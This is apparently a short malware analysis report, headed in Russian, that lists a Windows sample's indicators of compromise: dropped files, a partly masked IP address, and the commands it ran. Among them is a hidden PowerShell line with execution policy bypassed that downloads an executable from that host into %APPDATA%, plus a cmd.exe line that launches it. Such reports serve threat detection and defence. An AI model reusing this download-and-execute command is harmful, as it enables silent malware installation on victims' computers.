Техническая информация
- http://11#.#0.146.148/genklangenes.exe как %appdata%\sharers.exe
- '<SYSTEM32>\cmd.exe' /C %APPDATA%\Sharers.exe
- %TEMP%\drdtfhgygeghd{В .sct
- %APPDATA%\sharers.exe
- %TEMP%\wolfless\ballepresserne\ophioglossum.geo
- %TEMP%\wolfless\ballepresserne\nonsuspensively\trevis\document-open-symbolic.symbolic.png
- %TEMP%\wolfless\ballepresserne\nonsuspensively\trevis\titreret.str
- %TEMP%\nss7b67.tmp\system.dll
- %TEMP%\drdtfhgygeghd{В .sct
- '11#.#0.146.148':80
- http://11#.#0.146.148/Genklangenes.exe
- '%APPDATA%\sharers.exe'
- '<SYSTEM32>\cmd.exe' /C %APPDATA%\Sharers.exe' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://11#.#0.146.148/Genklangenes.exe','%APPDATA%\Sharers.exe')' (со скрытым окном)